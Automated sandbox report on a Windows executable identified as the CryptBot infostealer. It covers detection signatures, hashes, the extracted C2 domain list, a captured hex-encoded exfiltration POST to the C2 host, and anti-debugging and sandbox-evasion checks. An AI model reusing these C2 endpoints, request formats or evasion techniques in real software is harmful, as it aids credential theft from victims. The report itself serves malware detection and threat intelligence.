Edit tour

Windows Analysis Report
random(5).exe

Overview

General Information

Sample name:	random(5).exe
Analysis ID:	1583231
MD5:	f200a3445a8034d201eeb79bb29e1d73
SHA1:	473cd32eb4bc8ff05c3e608b86ba651fc4d7b0e1
SHA256:	ee6c112a14a1e5a9429b47f5b810f61a58e77860eea867e064d2ab40582757cc
Tags:	exelev-tolstoi-comuser-JAMESWT_MHT
Infos:

Detection

Cryptbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Cryptbot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Infostealer behavior detected

Leaks process information

Machine Learning detection for sample

PE file contains section with special chars

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to create an SMB header

Detected potential crypto function

Entry point lies outside standard sections

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

random(5).exe (PID: 5792 cmdline: "C:\Users\user\Desktop\random(5).exe" MD5: F200A3445A8034D201EEB79BB29E1D73)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": ["KvgPhome.fortth14vs.top", ".for8014vs.top", "home.fortth14vs.top", ".1.1home.fortth14vs.top", ".forth14vs.top", "fortth14vsh14vs.top"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: random(5).exe PID: 5792	JoeSecurity_Cryptbot_1	Yara detected Cryptbot	Joe Security

HTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 442005Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 36 37 36 30 34 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Thu, 02 Jan 2025 08:15:13 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Thu, 02 Jan 2025 08:15:14 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.css
Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.jpg
Source: random(5).exe, random(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14vs.top/gduZ
Source: random(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14vs.top/gduZ0
Source: random(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14vs.top/gduZT
Source: random(5).exe, 00000000.00000002.2257978659.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
Source: random(5).exe, 00000000.00000002.2257978659.00000000007BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963
Source: random(5).exe, 00000000.00000002.2257978659.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251580735.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258142461.00000000007F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0
Source: random(5).exe, 00000000.00000003.2251580735.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258142461.00000000007F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0U
Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah
Source: random(5).exe, 00000000.00000002.2257978659.00000000007BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lse
Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18
Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: random(5).exe	String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: random(5).exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: random(5).exe, random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: random(5).exe	String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://httpbin.org/ip
Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://httpbin.org/ipbefore

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710

System Summary

PE file contains section with special chars

Source: random(5).exe	Static PE information: section name:
Source: random(5).exe	Static PE information: section name: .idata
Source: random(5).exe	Static PE information: section name:

Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_0085B9E5	0_3_0085B9E5
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_0085B9E5	0_3_0085B9E5
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_0085B9E5	0_3_0085B9E5
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_00861574	0_3_00861574
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_00861574	0_3_00861574
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_00861574	0_3_00861574
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_0085B9E5	0_3_0085B9E5
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_0085B9E5	0_3_0085B9E5
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_0085B9E5	0_3_0085B9E5
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_00861574	0_3_00861574
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_00861574	0_3_00861574
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_00861574	0_3_00861574
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_0085B9E5	0_3_0085B9E5
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_0085B9E5	0_3_0085B9E5
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_0085B9E5	0_3_0085B9E5
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_00861574	0_3_00861574
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_00861574	0_3_00861574
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_00861574	0_3_00861574
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E405B0	0_2_00E405B0
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E46FA0	0_2_00E46FA0
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00EFB180	0_2_00EFB180
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E6F100	0_2_00E6F100
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00F000E0	0_2_00F000E0
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_011BA000	0_2_011BA000
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_011BE050	0_2_011BE050
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E96210	0_2_00E96210
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00EFC320	0_2_00EFC320
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00F00420	0_2_00F00420
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_01184410	0_2_01184410
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_01196730	0_2_01196730
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_011B4780	0_2_011B4780
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E3E620	0_2_00E3E620
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E9A7F0	0_2_00E9A7F0
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00EFC770	0_2_00EFC770
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E3A960	0_2_00E3A960
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E44940	0_2_00E44940
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00EEC900	0_2_00EEC900
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_010EAB2C	0_2_010EAB2C
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_011A8BF0	0_2_011A8BF0
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E3CBB0	0_2_00E3CBB0
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00FC4B60	0_2_00FC4B60
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_01006AC0	0_2_01006AC0
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_010EAAC0	0_2_010EAAC0
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_011B4D40	0_2_011B4D40
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_011ACD80	0_2_011ACD80
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_011BCC90	0_2_011BCC90
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_01182F90	0_2_01182F90
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_0114AE30	0_2_0114AE30
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00EFEF90	0_2_00EFEF90
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00EF8F90	0_2_00EF8F90
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E54F70	0_2_00E54F70
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E410E6	0_2_00E410E6
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_011A35B0	0_2_011A35B0
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_0119D430	0_2_0119D430
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_011C17A0	0_2_011C17A0
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_011856D0	0_2_011856D0
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_01189920	0_2_01189920
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00EE9880	0_2_00EE9880
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_011A1BD0	0_2_011A1BD0
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E71BE0	0_2_00E71BE0
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_011B3A70	0_2_011B3A70
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E45DB0	0_2_00E45DB0
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_010E9C80	0_2_010E9C80
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_01197CC0	0_2_01197CC0
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E43ED0	0_2_00E43ED0
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E55EB0	0_2_00E55EB0

Source: C:\Users\user\Desktop\random(5).exe	Code function: String function: 00E3C960 appears 37 times
Source: C:\Users\user\Desktop\random(5).exe	Code function: String function: 00F144A0 appears 76 times
Source: C:\Users\user\Desktop\random(5).exe	Code function: String function: 00E373F0 appears 114 times
Source: C:\Users\user\Desktop\random(5).exe	Code function: String function: 00FE7220 appears 97 times
Source: C:\Users\user\Desktop\random(5).exe	Code function: String function: 00E750A0 appears 101 times
Source: C:\Users\user\Desktop\random(5).exe	Code function: String function: 00E74FD0 appears 291 times
Source: C:\Users\user\Desktop\random(5).exe	Code function: String function: 00E74F40 appears 347 times
Source: C:\Users\user\Desktop\random(5).exe	Code function: String function: 00E3CAA0 appears 64 times
Source: C:\Users\user\Desktop\random(5).exe	Code function: String function: 00E75340 appears 50 times
Source: C:\Users\user\Desktop\random(5).exe	Code function: String function: 00E371E0 appears 47 times
Source: C:\Users\user\Desktop\random(5).exe	Code function: String function: 00E4CD40 appears 75 times
Source: C:\Users\user\Desktop\random(5).exe	Code function: String function: 00E4CCD0 appears 54 times
Source: C:\Users\user\Desktop\random(5).exe	Code function: String function: 0100CBC0 appears 104 times
Source: C:\Users\user\Desktop\random(5).exe	Code function: String function: 00E375A0 appears 706 times

Source: random(5).exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: random(5).exe

Static PE information: Section: whflkpvn ZLIB complexity 0.994563728436086

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2

Source: C:\Users\user\Desktop\random(5).exe

Code function: 0_2_00E3255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,

0_2_00E3255D

Source: C:\Users\user\Desktop\random(5).exe

Code function: 0_2_00E329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,

0_2_00E329FF

Source: C:\Users\user\Desktop\random(5).exe

Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\random(5).exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\random(5).exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: random(5).exe	Virustotal: Detection: 48%
Source: random(5).exe	ReversingLabs: Detection: 44%

Source: random(5).exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: random(5).exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\random(5).exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: random(5).exe

Static file information: File size 4484096 > 1048576

Source: random(5).exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x289000
Source: random(5).exe	Static PE information: Raw size of whflkpvn is bigger than: 0x100000 < 0x1ba000

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\random(5).exe

Unpacked PE file: 0.2.random(5).exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;whflkpvn:EW;esywlygt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;whflkpvn:EW;esywlygt:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random(5).exe

Static PE information: real checksum: 0x4507bd should be: 0x4519af

Source: random(5).exe	Static PE information: section name:
Source: random(5).exe	Static PE information: section name: .idata
Source: random(5).exe	Static PE information: section name:
Source: random(5).exe	Static PE information: section name: whflkpvn
Source: random(5).exe	Static PE information: section name: esywlygt
Source: random(5).exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_3_00845F60 pushfd ; ret	0_3_00845F61
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_011B41D0 push eax; mov dword ptr [esp], edx	0_2_011B41D5
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00EB2340 push eax; mov dword ptr [esp], 00000000h	0_2_00EB2343
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00EEC7F0 push eax; mov dword ptr [esp], 00000000h	0_2_00EEC743
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E8E92D push es; retf	0_2_00E8E92E
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E70AC0 push eax; mov dword ptr [esp], 00000000h	0_2_00E70AC4
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E91430 push eax; mov dword ptr [esp], 00000000h	0_2_00E91433
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00EB39A0 push eax; mov dword ptr [esp], 00000000h	0_2_00EB39A3
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E8DAD0 push eax; mov dword ptr [esp], edx	0_2_00E8DAD1
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_011B9F40 push dword ptr [eax+04h]; ret	0_2_011B9F6F

Source: random(5).exe

Static PE information: section name: whflkpvn entropy: 7.955966555987466

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\random(5).exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Window searched: window name: Filemonclass	Jump to behavior
